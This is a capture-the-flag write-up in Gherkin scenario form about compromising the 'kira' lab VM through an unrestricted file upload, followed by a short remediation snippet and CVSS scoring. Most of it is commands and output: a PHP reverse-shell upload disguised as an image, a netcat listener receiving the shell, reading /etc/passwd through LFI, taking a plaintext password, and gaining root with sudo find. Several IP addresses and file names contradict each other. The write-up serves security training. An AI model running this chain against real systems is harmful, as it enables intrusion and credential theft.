## Version 1.4.1
## language: en

Feature:
  TOE:
    kira
  Category:
    File Upload
  Location:
    http://192.168.0.8:80/
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
  Rule:
    REQ.043: https://fluidattacks.com/web/rules/043/
    REQ.040: The system must validate that the format (structure)
     of the files corresponds to its extension.
    REQ.041: The system must validate that the content of the files
     transferred to the same system is free of malicious code.
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Add type checks to restrict the uploadable file types

  Background:
  Hacker Software:
    | <Software name>   | <Version> |
    | Kali Linux        |  2020.3   |
    | Nmap              |  7.80     |
    | VirtualBox        |  6.1      |
    | Firefox           |  79.0     |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on Virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.0.1/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-21 09:35 EST
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.0034s latency).
    Nmap scan report for 192.168.0.3 (192.168.0.3)
    Host is up (0.028s latency).
    Nmap scan report for 192.168.0.5 (192.168.0.5)
    Host is up (0.00090s latency).
    Nmap scan report for 192.168.0.7 (192.168.0.7)
    Host is up (0.021s latency).
    Nmap scan report for bassam-aziz (192.168.0.8)
    Host is up (0.0013s latency).
    Nmap scan report for kali (192.168.0.11)
    Host is up.
    Nmap done: 256 IP addresses (6 hosts up) scanned in 4.16 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.5
    """
    $ sudo nmap -sV -sS 192.168.0.11
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-21 09:40 EST
    Nmap scan report for bossplayers (192.168.0.5)
    Host is up (0.0010s latency).
    Not shown: 998 filtered ports
    PORT   STATE SERVICE VERSION
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds?
    2179/tcp open  vmrdp?
    3306/tcp open  mysql         MySQL (unauthorized)
    3580/tcp open  http          National Instruments LabVIEW service locator
    5280/tcp open  flexlm        FlexLM license manager
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.8:80/
    And the bossplayers CTF homepage is displayed [evidences](01.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    When I access the site http://192.168.0.8:80/upload.php
    Then I see a message [evidences](02.png)
    """
    File is not image
    """
    Given the language.php page I observe which may be vulnerable by LFI
    Then I try to read the /etc/passwd path [evidences](03.png)
    And I confirm the LFI vulnerability on the server

  Scenario: Exploitation
    Given the site is vulnerable to unrestricted file upload
    Then the idea is to take advantage of vulnerability as a first validation
    And upload the file "php-revshell.php.png" [evidences](04.png)
    Then to use nc to listen to port 1234
    """
    nc -lvp 1234

    listening on [any] 1234 ...
    connect to [192.168.0.11] from (UNKNOWN) [192.168.0.8] 54048
    Linux bassam-aziz 5.3.0-28-generic #30~18.04.1-Ubuntu SMP
    19:21:02 up 59 min,  1 user,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    bassam   :0       :0               18:22   ?xdm?   1:25   0.02s
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    """
    Given the vulnerability it is used Interactive Terminal Spawned via Python
    """
    nc -lvp 1234
    listening on [any] 1234 ...
    192.168.0.5: inverse host lookup failed: Host name lookup failure
    connect to [192.168.0.9] from (UNKNOWN) [192.168.0.5] 43518
    /bin/sh: 0: can't access tty; job control turned off
    $ python3 -c "import pty;pty.spawn('/bin/bash')"
    www-data@bassam-aziz:/$ id && whoami
    id && whoami
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    www-data
    www-data@bassam-aziz:/$ cd /var/www/html/supersecret-for-aziz
    cd /var/www/html/supersecret-for-aziz
    www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls
    ls
    bassam-pass.txt
    www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat bassam-pass.txt
    cat bassam-pass.txt
    Password123!@#
    $
    """
    Given the password, authentication is performed on the system
    And the commands allowed by the bassam user are listed
    """
    www-data@bassam-aziz:/$ su bassam
    su bassam
    Password: Password123!@#

    bassam@bassam-aziz:/$ sudo -l
    sudo -l
    [sudo] password for bassam: Password123!@#

    Matching Defaults entries for bassam on bassam-aziz:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin

    User bassam may run the following commands on bassam-aziz:
        (ALL : ALL) /usr/bin/find
    """
    Given the permissions I take the session as root user
    """
    bassam@bassam-aziz:/$ sudo find . -exec /bin/sh \; -quit
    sudo find . -exec /bin/sh \; -quit
    [sudo] password for bassam: Password123!@#

    # id && whoami
    id && whoami
    uid=0(root) gid=0(root) groups=0(root)
    root
    # cd /root
    cd /root
    # ls
    ls
    flag.txt
    # cat flag.txt
    cat flag.txt
    THM{xxxx-xx_xxxxxx-xxxx_xxx-xx-xxx-xxxxx}
    """
    Given the new privileges on the root.txt
    Then the flag is read [evidences](05.png)

  Scenario: Remediation
    Given The website is vulnerable loaded files
    When The website is upload a file
    Then The file extensions must be verified
    """
    $allowed = array('gif', 'png', 'jpg');
    $filename = $_FILES['image']['name'];
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    if (!in_array($ext, $allowed)) {
      echo 'error';
    }
    """
    And The website could be shielded against files with dangerous type

  Scenario: Scoring
   Severity scoring according to CVSSv3 standard
   Base: Attributes that are constants over time and organizations
     10/10 (high) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
   Temporal: Attributes that measure the exploit's popularity and fixability
     7/10 (high) - E:H/RL:O/RC:C
   Environmental: Unique and relevant attributes to a specific user environment
     7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-12-21
